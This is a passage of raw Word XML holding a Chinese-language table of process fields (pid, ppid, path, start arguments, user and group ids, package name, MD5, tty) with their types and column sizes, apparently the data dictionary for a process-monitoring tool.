            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="316C995A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程版本，仅windows可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05827CF7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F847C81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A964D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="358D5475" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09EDDEA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否root权限启动，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23DB20D3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A00C53A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prtCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A9B3670" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F841D9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A70C8FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程端口数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5FAA5B50" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2886F7C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CDB43F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62CB0B95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22883D74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>可执行文件md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7258EE50" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="257DF38A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>packageName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BF4C90D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28D1E259" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16E53618" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程对应软件包名称，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76EA2D59" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58BB6AB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>packageVersion</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28FA1832" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D7EF99A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B3A4EB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程对应软件包版本，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7CCA24AE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10DAA6FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>installByPm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F453B43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DFF3CC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13CB640E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否包管理器安装，Windows为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05D0F445" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71EE1EDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57232DFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA87982" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="094A6352" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D6807F4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C37A660" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ppid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DF68A44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="362320EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CB31636" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C2205AB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B06230A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="557AF2CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68C176D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60F9042C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="37B3C095" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50404A5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startArgs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D719213" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FDB6E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="585E60C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="22389AFE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05EFEB80" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="602A3908" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EDAD633" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C584AC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程状态，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="55E36B14" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="709EC3AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15C6005F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6808F049" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39F70E11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="547F6398" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="108FD45B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78D264B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6EF9DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E7408B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EDDECE6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="361C9583" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01A08D86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0761F35F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53C24500" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2C2555F5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02D61843" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A6D7A9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05059C54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="434AEAFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户组id，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E0F176C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F5F6961" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tty</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A5A6BC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E4A9D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5453CDE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动的TTY，仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4DFA2C54" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1402516B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37FA3EC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16472805" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
